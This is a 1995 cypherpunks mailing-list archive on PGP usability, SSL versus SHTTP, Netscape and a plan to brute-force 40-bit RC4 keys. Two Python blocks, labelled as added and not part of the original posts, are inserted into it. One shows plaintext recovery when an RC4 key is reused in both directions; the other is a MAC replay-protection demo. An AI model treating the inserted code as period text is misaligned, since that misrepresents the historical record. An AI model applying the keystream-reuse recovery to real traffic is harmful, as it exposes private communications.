To: "Robert A. Hayden" <cypherpunks@toad.com>
Subject: Re: "Hey Phil! Stop telling people *not* to use PGP!"
Message-ID: <199507200737.AAA05005@ix6.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 02:00 PM 7/19/95 -0500, Robert A. Hayden wrote:
>> I am fond of saying that we PGP enthusiasts have two choices ahead of us
>> within a couple of years:  either 5,000 enthusiasts using PGP with
>> MAXIMAL SECURITY at all times, or 5,000 enthusiasts with MAXIMAL
>> SECURITY and 10,000,000 computer-illiterate e-mail users using PGP with
>> push-button interfaces and multi-user remote systems.

>I said it last week, and I'll say it again.  From a sociological
>standpoint, it's those 10,000,000 computer-illiterate e-mail users that we
>need to focus all of our efforts towards.  Those 5,000 literate people we 
>really don't have to care about.

But there are two different classes of issues here - the convenience-only
issues, which can be fixed with bells and whistles and GUIs and
audio-enhanced-RTFM-buttons, and the security-related issues.  For security,
there are three classes of users:
        1 - folks with standalone systems and dial-up mail - no problem
                This is a _lot_ of users - AOL, Compuserve, etc.
        2 - folks with single-user systems on networks - they need to make
                sure they've got PGP installed right (relatively easy,
                with local disks, but fancy install widgets may help),
                but beyond that they've got to know that PGP is only as
                secure as their machine and network configuration.  Mostly ok,
                and to the extent it's not, they've got other serious problems.
                This is also a lot of users.
        3 - folks with shared machines - these folks (mostly Unix users and
                college students, plus people who have web-space they need
                to telnet to, like me) do need to know their limitations,
                and currently have the most problems with convenience,
                having to haul files back to a secure machine to encrypt
                securely.

                The first step is education - manuals that say "Don't Panic
                Unless You Need To Be Paranoid" instead of "Panic Immediately",
                that can make them aware of the risks and tradeoffs.  It's about
                two pages of well-written stuff, if someone wants to write it.
                The next step is either building convenient tools to help
                them with encryption, or building convenient installation
                scripts for the tools that already exist (e.g. mail, or
                scriptable terminal emulators which can automate a lot of the
                hauling around.)

The big payoffs are for groups 1 and 2, but a lot of the technically savvy
people who read manuals and have to convince system administrators to install
stuff are in group 3.  So this is basically a writing job, plus talking the
PGP 3.0 people and maybe Phil into including the discussion with the manuals.
Remailers, btw, are in this class, since they need to leave their
passphrases out in relatively unprotected shell scripts.

I used to run PGP on a diskless workstation (at least I was one
of the people with the root password :-), but I was aware of the risks.
I'm now using it both on my Netcom+Eudora+PrivateIdaho system and on the
machine where I have web space, which I have to telnet to across Netcom.
I take care of the trust problem there by using a short key with a big ugly
"untrustable" string in the user name, and using S/Key to log in;
if I had an encrypted telnet to run on both ends I'd probably want to use it,
so I'm watching the Stel and other new stuff coming out.

                                    Bill Stewart


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: You can get PGP by anonymous ftp from ftp.ox.ac.uk

iQBVAwUBMA4HvfthU5e7emAFAQFrMwH9Hh1oYQKvsuV/IyVUskv2aZbmuh8fXQgK
XpSpucrJV27tlFbjIDVqmapMR77arZVOm2Hs0/NTB2uT2jDG1r5+Lw==
=fRtS
-----END PGP SIGNATURE-----
#                                Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lmccarth@cs.umass.edu (L. McCarthy)
Date: Wed, 19 Jul 95 21:56:21 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Stego Standards Silly
In-Reply-To: <8AD8535.00030001EC.uuout@famend.com>
Message-ID: <9507200456.AA17771@cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


I suggested a scenario in which:
>>> use of "conspicuous" digital signatures is legal

Monty Harder writes:
>   Ah.  No big deal then.  After stegoing, you sign the GIF.

Yes, that was exactly the point I made in my previous message.

>   But I am having a real problem with an overt policy of fiddling with
> people's mail. If they did that, it would likely cause a huge backlash
> that would be felt at the ballot box.

I'm not so sure. (Yes, I'm very cynical about humans -- more than most people
on the list, I think.)  Everybody and her sister has been bombarding the
firewalls list lately, asking about virus scanners and such. IMHO a *lot* of
folks would be quite content to have somebody filter their mail "for viruses,
harassment, etc."  I hope I'm wrong....

-Futplex <futplex@pseudonym.com>



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Derek Atkins <warlord@MIT.EDU>
Date: Thu, 20 Jul 95 00:05:43 PDT
To: "Ed Carp [khijol Sysadmin]" <erc@khijol.intele.net>
Subject: Re: Netscape the Big Win
In-Reply-To: <Pine.3.89.9507200057.M2934-0100000@khijol>
Message-ID: <199507200705.DAA15320@toxicwaste.media.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


> I assume that there is a version available for UNIX, yes?

It was originally released for Solaris 2.X machines, and it is
currently being ported to a lot of other platforms.  The major problem
is that it requires a lot of threads support, which makes it difficult
to port.

-derek





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Thu, 20 Jul 95 00:25:40 PDT
To: The Gate <gate@id.wing.net>
Subject: Re: Investigate Your Federal Building :)
In-Reply-To: <Pine.3.89.9507191717.A8562-0100000@dialin1.wing.net>
Message-ID: <9507200725.AA11960@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



What pray tell, does this have to do with cypherpunks?

The Gate writes:
> Had problems with the original transmission...
> 
> 21:22 EST
> July 17th, 1995
> New Haven, CT
> 
> Day One, Investigation Begins.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Thu, 20 Jul 95 00:48:00 PDT
To: tcmay@sensemedia.net (Timothy C. May)
Subject: Re: Netscape the Big Win
In-Reply-To: <ac330625030210040787@[205.199.118.202]>
Message-ID: <9507200747.AA15208@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



Timothy C. May writes:
> Integration of crypto into Netscape is thus the Big Win.

Crypto *is* integrated into Netscape. Unfortunately, the crypto is SSL
-- a complete waste of time.

Among other things, SSL only lets you authenticate to X.509
certificate roots that have been issued straight from the hands of Jim
Bidzos -- which effectively means that you can secure only connections
with Netscape commerce servers, and that you cannot authenticate both
ends of the communications link. It's also just plain bad -- there are
ugly holes in the security from what I can see. Netscape is, of
course, pushing it as a standard. Vomit.

Luckily, Netscape recently hired Tahir El Gammal (did I put too many
m's there?) and he's a smart guy. Unfortunately, he seems to be in a
position where he has to defend the fairly bad work they did already.

Other web security systems are also on their way out, of course. Our
own Eric Rescorla (who lurks most of the time) is the author of the
SHTTP specification.

> The relevance for Cypherpunks interested in writing code is that, in my
> carefully considered opinion, writing for Netscape and other Web browsers
> is the Big Win. Even over Windows (except Windows browsers, of course).

Netscape is a closed system. You can't write code for it unless you
work for Netscape.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: perry@imsi.com (Perry E. Metzger)
Date: Thu, 20 Jul 95 01:27:15 PDT
To: cypherpunks@toad.com
Subject: Name misspelling
Message-ID: <9507200827.AA14586@webster.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain


I've been informed that the proper spelling was Taher Elgamal.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: an253398@anon.penet.fi (Mole Rat)
Date: Wed, 19 Jul 95 23:27:57 PDT
To: cypherpunks@toad.com
Subject: Re: Anti-Electronic Racketeering Act of 1995 (fwd)
Message-ID: <9507200542.AA23518@anon.penet.fi>
MIME-Version: 1.0
Content-Type: text/plain


Ray Arachelian writes:
 > Hell, at this point, my guess is that the mafia(s) doesn't use crypto, or 
 > that if it does, it can be caught via other means.  A strong, well 
 > developed crypto system in use by the mafia would more than likely never 
 > happen... not until mobsters get into computers.  Ditto for terrorists.

     Sounds like an untapped market segment.  In which periodicals
     should one advertise consulting services in order to cover the
     mobster market?

     Seriously, I imagine that organized crime, like any other
     business, uses computers.  Their level of crypto usage could be
     impressive, given the incentives.

 > If they did use crypto, I suspect they wouldn't get caught.  (For the 
 > paranoid, assuming they used crypto, and they didn't get caught, then the 
 > FBI or other TLA is doing the same as the gov't in Fahrenheit 451... 
 > pick someone else, and jail them.  Otherwise, how do you explain all the 
 > jailbird mobsters?)

     "There is no honor among thieves."  Wiretaps, bugs, tails,
     informants, and good, old-fashioned, physical intimidation
     probably produce plenty of leads.

     I wasn't entirely facetious above about working for the mob,
     they probably pay well and don't bother with FICA and such.  Plus
     there's that "family" atmosphere....
----------------------------------------------------------------------------
To find out more about the anon service, send mail to help@anon.penet.fi.
If you reply to this message, your message WILL be *automatically* anonymized
and you are allocated an anon id. Read the help file to prevent this.
Please report any problems, inappropriate use etc. to admin@anon.penet.fi.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike Godwin <mnemonic@eff.org>
Date: Thu, 20 Jul 95 04:44:58 PDT
To: shabbir@panix.com
Subject: Re: Why no action alert, coalition opposing S. 974?
In-Reply-To: <199507192226.SAA10293@panix4.panix.com>
Message-ID: <199507201143.HAA26318@eff.org>
MIME-Version: 1.0
Content-Type: text/plain


 
Shabbir writes:

> S 974 is a silly bill.  It's like someone went around and made a list
> of all the things that would irk us and then wrote legislation
> around it.
> 
> However this bill isn't immediately going anywhere, and there's more
> dangerous legislation on the floor that is looking a lot like a loaded
> gun.
> 
> VTW is tracking this bill and will put out alerts on it if it becomes
> a more valid threat.  However until then we'll not try to divide the
> forces of the net on bills that aren't yet a serious threat.
> 
> Read the bill, familiarize yourself with the analyses, but let's not
> go running off every time some DC bozo writes a terrible bill.  Especially
> when there isn't even a subcommittee hearing scheduled yet.
> 
> Let's try and do *one thing* at a time.
 
I just want to say: I endorse everything Shabbir says here. 


--Mike







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Otto <dave@dvorak.jta.edd.ca.gov>
Date: Thu, 20 Jul 95 07:48:46 PDT
To: cman@communities.com (Douglas Barnes)
Subject: Re: Netscape the Big Win
In-Reply-To: <v02120d2cac338abe35db@[199.2.22.120]>
Message-ID: <199507201449.HAA02245@dvorak.jta.edd.ca.gov>
MIME-Version: 1.0
Content-Type: text/plain


on Wed, 19 Jul 1995 20:24:31 -0800  Douglas Barnes wrote:
> available on Suns running Solaris 2.4 and PCs running Windows NT.
               ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Are there any plans to port JAVA to a REAL operating system?  Support
for crypto needs to be ubiquitous to work.  Start with the fanatics
(Linux and FreeBSD) and the other platforms will quickly follow (often
ported by the aforementioned fanatics so that the departmental server
can run the same code as their desktop box :-).

                Dave Otto - Vinimus, Vedimus, Dolivamus
    http://ACM.org/~daveotto/   http://ACM.org/~daveotto/linux.html/
              dave@dvorak.jta.edd.ca.gov daveotto@acm.org
  "Pay no attention to the man behind the curtain!"     [the Great Oz]
     finger DaveOtto@ACM.org/or server for PGP 2.6 key  <0x3300e841>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Thu, 20 Jul 95 07:54:57 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape the Big Win
In-Reply-To: <9507200747.AA15208@snark.imsi.com>
Message-ID: <199507201453.HAA19510@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


"Perry E. Metzger" <perry@imsi.com> writes:

>Crypto *is* integrated into Netscape. Unfortunately, the crypto is SSL
>-- a complete waste of time.

>Among other things, SSL only lets you authenticate to X.509
>certificate roots that have been issued straight from the hands of Jim
>Bidzos -- which effectively means that you can secure only connections
>with Netscape commerce servers, and that you cannot authenticate both
>ends of the communications link. It's also just plain bad -- there are
>ugly holes in the security from what I can see. Netscape is, of
>course, pushing it as a standard. Vomit.

Unfortunately the main alternative to SSL being pushed now, SHTTP, also
suffers from RSA-itis.  It will support either PEM or PKCS-7 key
certificates, so I think ends up being pretty much the same as SSL in
this regard.

Note though that neither SSL nor SHTTP requires that the certificates come
from RSA.  However the current versions of Netscape's browser do require this.
This has been the source of much complaint and Netscape has promised that
they will have some mechanism in the future to allow the user to
choose his certificate signers.  I am not sure how far RSA will let them
off the leash, though.

The current version of SSL supports client authentication (via X.500
certificates of course).

rsalz@osf.org writes re SSL:

>I think it
>was Perry, for example, that pointed out that using one RC4 stream for
>each comm half was more-or-less obvious and standard practice.

I'm not sure what this is getting at.  SSL does use a separate RC4 stream
for each comm half.  Is this a suggestion that a single key should be
used for both directions?  There are two ways that could be done: keep
separate state info for each direction, in which case you are encrypting
data twice with the same pseudo-random string, a definite no-no; or try
to keep a single global state for the cipher, but this is impossible due
to the (potentially) asynchronous nature of the communications.

Back to Perry:

>Netscape is a closed system. You can't write code for it unless you
>work for Netscape.

That is why I am working on the proxy approach.  Any browser should be
able to use enhancements supplied in this way.  Netscape is the big name
this year, who knows who it will be next year.  As long as IP
connectivity is available a proxy can get into the stream and apply
enhancements.

Hal
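
The "definite no-no" in the message above, encrypting both directions under the same RC4 key with separate state, shown as an added example that is not part of the original post and is not SSL's code. The keys and the sample request and response are constructed; RC4 is implemented inline so the block runs with the standard library only.

```python
def rc4_keystream(key, n):
    """Return the first n bytes of the RC4 keystream for key (bytes)."""
    s = list(range(256))
    j = 0
    for i in range(256):  # key scheduling
        j = (j + s[i] + key[i % len(key)]) % 256
        s[i], s[j] = s[j], s[i]
    i = j = 0
    out = bytearray()
    for _ in range(n):  # output generation
        i = (i + 1) % 256
        j = (j + s[i]) % 256
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) % 256])
    return bytes(out)


def xor(a, b):
    """XOR two byte strings, truncated to the shorter one."""
    return bytes(x ^ y for x, y in zip(a, b))


def rc4(key, data):
    """Encrypt (or decrypt) data with a fresh RC4 state for key."""
    return xor(data, rc4_keystream(key, len(data)))


# Constructed sample traffic and 40-bit keys.
REQUEST = b"GET /order.html HTTP/1.0\r\n\r\n"
RESPONSE = b"HTTP/1.0 200 OK\r\nContent-type: text/html\r\n\r\n<title>Order status</title>"
KEY_A = bytes.fromhex("0102030405")
KEY_B = bytes.fromhex("a1b2c3d4e5")


def observer_view(key_to_server, key_to_client):
    """What a passive observer gets from the two ciphertexts alone.

    XORing the ciphertexts cancels the keystream when both directions used
    the same key; XORing in a guessed request then leaves the response.
    """
    c_request = rc4(key_to_server, REQUEST)
    c_response = rc4(key_to_client, RESPONSE)
    return xor(xor(c_request, c_response), REQUEST)


if __name__ == "__main__":
    n = len(REQUEST)
    shared = observer_view(KEY_A, KEY_A)
    separate = observer_view(KEY_A, KEY_B)
    print("same key both ways :", shared)            # start of RESPONSE, in clear
    print("one key per half   :", separate.hex())    # unrelated bytes
    print("leak with shared key:", shared == RESPONSE[:n])
    print("leak with separate keys:", separate == RESPONSE[:n])
```

With one key per direction the two keystreams are unrelated, so the same XOR yields nothing useful; that is the design Hal describes SSL as using.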




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei>
Date: Thu, 20 Jul 95 05:53:40 PDT
To: cypherpunks@toad.com
Subject: Re: (Cracking) Netscape (is) the Big Win
Message-ID: <9507201253.AA18741@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


> 
> Timothy C. May writes:
> > Integration of crypto into Netscape is thus the Big Win.
> Crypto *is* integrated into Netscape. Unfortunately, the crypto is SSL
> -- a complete waste of time.
>[snip] 
> Perry

This is why it's imperative for cpunks to work on the SSL challenge
recently posted. Cracking 40 bit RC4 will provide a strong industry
incentive to move towards stronger crypto standards, and to pressure
the government to relax ITAR. 

If the SSL crack looks like it will take a while to gear up, perhaps
we should work on an interim project, cracking a straight 40bit rc4
encrypted message. If there is interest, I can create such a text, and 
escrow the key and plaintext in a PGP-encoded posting. 

While such a crack will not be as strong a blow against SSL and 
40-bit crypto as cracking a complete SSL transaction, it will be
a lot better than only being able to say 'Well, we didn't find a
key, but we *did* sweep 40 bits of keyspace', which is all we have
now. If need be, we can follow up with a crack of full-bore SSL.

Disclaimer: I work on a competing product, but am posting this in 
my private capacity. We've bigger fish to fry than Netscape.

Peter Trei
ptrei@acm.org

Peter Trei
Senior Software Engineer
Purveyor Development Team                                
Process Software Corporation
trei@process.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: monty.harder@famend.com (MONTY HARDER)
Date: Thu, 20 Jul 95 09:06:04 PDT
To: CYPHERPUNKS@toad.com
Subject: Re: Free The World Web Server project.. :)
In-Reply-To: <8AD81C0.00030001D9.uuout@famend.com>
Message-ID: <8AD9224.00030001F5.uuout@famend.com>
MIME-Version: 1.0
Content-Type: text/plain


PE> > PE> would be discerned by a staffer in moments. Crap like this is called
PE> >
PE> >   They should know, because they send form letters to constituents all
PE> > the time, only they don't bother to vary it a bit.
PE>
PE> Misdirection. This has nothing to do with my point. The staffers will
PE> STILL toss your stuff.

  After putting the appropriate tally mark on the sheet for the day's
mail, and sending out the response letter, yep. I don't expect Jan Meyers
to personally =ever= see my mail to her office. I only expect her
gruntlings to put that mark under "no" for the ______ Bill.

PE> >   Meanwhile, back at the ranch.
PE>
PE> In other words, you are choosing to ignore me. Regardless of whether

  Not at all. I concede that letters do not get read by Anyone
Important. I only want them to =count= the darned things, and the
variations in verbiage, margins, fonts, etc. should be enough to get
them classified as part of an organized letter-writing campaign, instead
of a form-letter-signing campaign. That puts the mark in a different
column.

PE> you are paying attentoion, however, you will still not be able to

  Not only am I paying attentoion [sic], but I know from experience that
the staffers at least have to pay enough themselves to know which form
letter to send me in response to my Heartfelt Expressions of Concern.
Without fail, I get that letter from Meyers' office, but only about half
the time from Dole or Kassebaum.

PE> > .. If one of our DC members can set up an
PE> > Imail-FAX gateway, we can publicize some nifty Iddresses for folx to
PE>
PE> Perhaps people who can be bothered to spell out "folks" properly also

  When I am writing to people whose opinion of my spelling I give a snit
about, I will spell it precisely as you indicate. If it annoys you, set
up your copy of exxxon to do the transform, or put my name in your twit
filter.  Talk about misdirection....

  But "folx" is exactly the kind of thing that tells the staffer that it
is =not= a form letter, because a computer would not be programmed to
use variant spellings, would it?


PE> are willing to write letters that will be paid attention to. As you
PE> seem to prefer to ignore the fact that you will be ignored, why are
PE> you willing to spend effort setting up an "Imail[sic]-FAX gateway"?

  Because that gateway can be used to convert genuinely original,
pseudo-original, or blatantly copied Internet mail,
                                     ^        ^^^^
       May God have mercy on my soul for having coined an =original=
     abbrv'n. rather than merely rearranging the words and phrases that
     others frequently use, which would, of course, be Astroturf<tm>. I
     have never seen the Houston Oilers play football on faxes
     before....

which has no, or virtually no, marginal cost to most net.people, into
actual paper, which, being tangible, has the potential to be counted as
Natural Grass, and thus not contribute to knee injuries.




 * Abuse of power comes as no surprise.
---
 * Monster@FAmend.Com *    




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 20 Jul 95 06:52:29 PDT
To: cypherpunks@toad.com
Subject: BUS_gut
Message-ID: <199507201352.JAA04327@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   7-20-95. NYPaper:


   "Clinton Assails Officers' Racist Event. Gathering Is
   Defended by the Organizer as Get-Acquainted Party."

      Mr. Rightmyer, organizer of the event, said he believed
      the criticism of the roundups was part of a politically
      motivated "setup" by the paramilitary group, the Gadsden
      Minutemen, who harbor intense hostility toward the ATF
      for its role in regulating the manufacture and sale of
      guns. Morris Dees, head of a prominent civil-rights
      organization, supported his view, and one Federal
      law-enforcement official said Mr. Rightmyer might be
      correct.                                       JIV_tun


   "Montana Tax Protester Is Shot During a Raid."

      Local law-enforcement authorities, who had waited for
      more than three years to arrest a tax protester, Gordon
      Sellner, accused of trying to kill a lawman, shot and
      wounded him in a raid on his home.             JAK_but


   [OpEd] "Terror In Montana: Judges do their jobs and risk
   their lives." 

      Martha A. Bethel has been a municipal judge in Montana
      for nine years. This article is adapted from a statement
      she made last week at a Congressional forum on the
      militia movement.                              JUG_hug



   Trio: BUS_gut






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Ellison <cme@TIS.COM>
Date: Thu, 20 Jul 95 07:02:13 PDT
To: cypherpunks@toad.com
Subject: IITF Report
Message-ID: <9507201400.AA03724@tis.com>
MIME-Version: 1.0
Content-Type: text/plain



The Information Infrastructure Task Force (IITF) National Information 
Infrastructure Security Issues Forum draft report can be found at:

http://ntiaunix1.ntia.doc.gov:70/0/iitf/security/fedrole.txt





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@sensemedia.net (Timothy C. May)
Date: Thu, 20 Jul 95 10:05:30 PDT
To: cypherpunks@toad.com
Subject: S/MIME and the Future of Netscape
Message-ID: <ac33d9e705021004c7d6@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



With regard to SSL and Netscape not being open to outside developers,
several leading e-mail outfits, including Qualcomm, Netscape, Frontier,
etc., are working on an interoperable secure e-mail standard called
"Secure/MIME," or "S/MIME."

And even if Netscape will not allow outside developers--like J. Random
Cypherpunk--access to the code internals and incorporation of his work into
Netscape's final compiled code, not surprisingly, there are still numerous
options for hooking in. Hal Finney described some ideas, and I'm sure more
exist.

--Tim May

..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,
tcmay@sensemedia.net   | anonymous networks, digital pseudonyms, zero
408-728-0152           | knowledge, reputations, information markets,
Corralitos, CA         | black markets, collapse of governments.
Higher Power: 2^756839 | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Thu, 20 Jul 95 07:15:54 PDT
To: tcmay@sensemedia.net
Subject: Re: Netscape the Big Win
Message-ID: <9507201415.AA23275@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


> Luckily, Netscape recently hired Taher Elgamal
> and he's a smart guy. Unfortunately, he seems to be in a
> position where he has to defend the fairly bad work they did already.

When I first saw him speak at the Danvers IETF I thought "gee, does this
bozo know he shares the same last name as a real bright guy"?  I think it
was Perry, for example, that pointed out that using one RC4 stream for
each comm half was more-or-less obvious and standard practice.

At last month's World Wide Web Consortium working group meeting on security,
everyone trashed SSL.  Everyone trashed the W3C for not just picking SHTTP
but instead trying to invent something new that "borrowed from" SHTTP.
Taher was silent on the former, but didn't disagree on the latter.  During
a break, in the hallway he mentioned how he's gonna have to do some
politicking back at the office, and that he's glad someone reasonable like
him came, and not other folks he could name.

> Netscape is a closed system. You can't write code for it unless you
> work for Netscape.

I thought they announced their intent to support java.
	/r$





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Thu, 20 Jul 95 10:23:43 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape the Big Win
Message-ID: <199507201722.KAA10382@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


From: Adam Shostack <adam@bwh.harvard.edu>
> 	Actually, it also supports Kerberos (not relevant to most of
> us), and PGP messaging.  Although a KCA would be needed before anything
> useful came of the PGP support, at least it's there.

It appears that support for PGP messaging has been removed from the
July 1995 SHTTP draft.  So it's X.500 all the way.
<URL:http://info.internet.isi.edu/in-drafts/files/draft-ietf-wts-shttp-00.txt>


From: Steven Champeon - Imonics Development <schampeo@imonics.com>
> The one "advantage" to SSL that they were pushing over SHTTP was that
> SSL is a socket-level encryption mechanism, as opposed to protocol-
> level. It doesn't conflict with SHTTP except in terms of adding to
> the processing time.
> 
> I guess I don't see why SSL is so awful from a crypto standpoint.
> Could someone a bit more educated on the nuts and bolts clue me
> in on its weaknesses? As compared to other schemes, perhaps?

Frankly I don't think SSL is particularly weak cryptographically.  It has
gone through several revisions as various problems were pointed out.

The one thing I would note is that there is considerable known plaintext
being exchanged in the handshake.  This helps with key guessing and will
be the foundation for the SSL challenge that Adam Back is organising.
IMO at least some of this material could have been sent encrypted with
the public key so that an eavesdropper couldn't know it.  OTOH this
might have run afoul of the NSA's rules on export for at least the 40 bit
version since you'd have more than 40 bits of secrecy in effect.

SSL includes a 16 byte checksum with each packet.  IMO this is overkill
and wasteful for small packets.  One thing about SSL is that it
provides both secrecy and immunity to certain kinds of active attacks.
These big checksums include a sequence number and key information to
prevent replay attacks.  For some purposes you might be satisfied with
secrecy and not want to pay this overhead.

I think a lot of the criticism of SSL was based on the thought that it
would be obsoleted by the new IP secure protocols.  That may be true
eventually but SSL is here today, in use.  Order something from
Netscape and it is secured with SSL.  Buy the domestic version if you
want real security.  For IP, many of us will have to wait until
the new IP protocols get built into our OS's and other infrastructure.

People have also objected to the use of the X.500 certificate approach.
But that seems to be de rigueur for any serious Internet standard these
days.  IMO the real solution is to come up with a PGP-like X.500
certificate maker so people can easily set themselves up as Certificate
Authorities and go about their business while the anal hierarchy
fans argue about liability.  Actually I think there is a PD certificate
maker around, possibly from Eric Young down under.

Hal
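
An added illustration of the per-record checksum Hal describes (not part of the original message and not Netscape's code): a 16-byte keyed MD5 over the payload and a sequence number, with one key per direction, rejects replayed, reordered, reflected and altered records. The MAC layout, key names and sample payloads are assumptions constructed for this example, and encryption is left out.

```python
import hashlib
import hmac
import struct

MAC_LEN = 16  # MD5 digest length: the "16 byte checksum" carried by every record


class RecordError(Exception):
    """Raised when a record fails its integrity check."""


def record_mac(mac_key: bytes, seq: int, payload: bytes) -> bytes:
    # Assumed layout: MD5(secret || payload || 32-bit sequence number).
    # Secret-prefix MD5 mirrors the 1995-era design only; new designs
    # should use HMAC-SHA-256 or an AEAD cipher instead.
    return hashlib.md5(mac_key + payload + struct.pack(">I", seq)).digest()


class Sender:
    def __init__(self, mac_key: bytes):
        self.mac_key = mac_key
        self.seq = 0  # implicit counter, never sent on the wire

    def seal(self, payload: bytes) -> bytes:
        tag = record_mac(self.mac_key, self.seq, payload)
        self.seq = (self.seq + 1) & 0xFFFFFFFF
        return tag + payload


class Receiver:
    def __init__(self, mac_key: bytes):
        self.mac_key = mac_key
        self.seq = 0  # must track the sender's counter exactly

    def open(self, record: bytes) -> bytes:
        if len(record) < MAC_LEN:
            raise RecordError("record shorter than the MAC")
        tag, payload = record[:MAC_LEN], record[MAC_LEN:]
        expected = record_mac(self.mac_key, self.seq, payload)
        if not hmac.compare_digest(tag, expected):
            # Wrong key, wrong sequence number or altered payload all land here.
            raise RecordError("MAC mismatch at sequence %d" % self.seq)
        self.seq = (self.seq + 1) & 0xFFFFFFFF
        return payload


def overhead_fraction(payload_len: int) -> float:
    """Share of the record taken by the checksum (the cost for small packets)."""
    return MAC_LEN / (MAC_LEN + payload_len)


def rejected(receiver: Receiver, record: bytes) -> bool:
    try:
        receiver.open(record)
    except RecordError:
        return True
    return False


def demo() -> dict:
    # Constructed keys: one per direction, as with the two RC4 streams.
    c2s_key = b"constructed-client-write-key"
    s2c_key = b"constructed-server-write-key"
    client_tx = Sender(c2s_key)
    server_rx = Receiver(c2s_key)
    client_rx = Receiver(s2c_key)

    r0 = client_tx.seal(b"PAY 10 TO ALICE")  # constructed payloads
    r1 = client_tx.seal(b"PAY 20 TO BOB")
    flipped = r0[:-1] + bytes([r0[-1] ^ 0x01])

    return {
        "in_order_accepted": server_rx.open(r0) == b"PAY 10 TO ALICE",
        # Same bytes again: the receiver now expects sequence 1, so the tag fails.
        "replay_rejected": rejected(server_rx, r0),
        # A failed record does not advance the counter, so r1 still verifies.
        "next_accepted": server_rx.open(r1) == b"PAY 20 TO BOB",
        # A record bounced back at its sender fails under the other direction's key.
        "reflection_rejected": rejected(client_rx, r0),
        "reorder_rejected": rejected(Receiver(c2s_key), r1),
        "tamper_rejected": rejected(Receiver(c2s_key), flipped),
    }


if __name__ == "__main__":
    for name, ok in demo().items():
        print(name, ok)
    print("overhead for a 1-byte payload: %.0f%%" % (100 * overhead_fraction(1)))
```
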




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@sensemedia.net (Timothy C. May)
Date: Thu, 20 Jul 95 10:32:13 PDT
To: cypherpunks@toad.com
Subject: RE: Netscape the Big Win
Message-ID: <ac33dc68060210045e75@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:18 PM 7/20/95, Pat Farrell wrote:

>The current trend is to bundle all types of functionality into huge
>monolithic programs. Add mail to netscape, add encryption, add ...
>
>Yet most of the computers people use are multi-windows, and soon most
>will even be multi-tasking.
>
>Why are all-in-one programs so preferable to using the windowing
>capabilities that are built into every X-window, Mac or Windows system?
>
>Why not use the best mail client, another best webcrawler, and yet another
>news reader?

Speaking for myself, consistency of user interface.

To that extent, Netscape (or Lotus Notes, in a different context) becomes
the "operating environment" for the user, the place where he does his work.


The News reader in Netscape 1.1N is as good as the main "separate" news
reader, NewsWatcher, for the Macintosh, and has some added benefits. For
example, URLs in News postings automatically show up as clickable items,
which can be jumped to immediately. (Other News programs _could_ do this,
and maybe some of them do, but not on the Macintosh, at this moment.)


>Microsoft has been preaching the use of OLE and component programs as its
>development vision for 2+ years, Macs have been popular for ten years,
>why is the trend still towards adding every possible bell and whistle
>to single programs?

I don't know why "componentware" has not taken off. But it hasn't. OpenDoc
and OLE 2 are coming, but slowly.

Big programs tend to grow because they can increase market share by adding
capabilities, by pulling in more customers. We might prefer a world of
smaller apps, with componentware pieces, but it rarely happens.

And I'm not going to use half a dozen small programs, each doing slightly
different things and having different commands, when one will do nicely.

(I could list other pluses and minuses, a la my outline FAQ, but here's
just one more important item: cross-compatibility. Namely, with N smaller
programs in use, of varying versions, incompatibilities and even crashes
can result all too often ("We have discovered that MailMuncher 2.12 does
not work with NewsNabber 1.1."). At least with something like Netscape, a
certain amount of cross-operability is likely, for various reasons.)

In any case, while I respect the views Pat is expressing, about
componentware and "small is better" approaches, the market is voting with
its feet for apps like Netscape, which are becoming the main programs folks
will use for communication, News reading, and Web surfing.

>With components, it wouldn't be hard to have a universal
>Encryption/Signature module. It would get around any proprietary
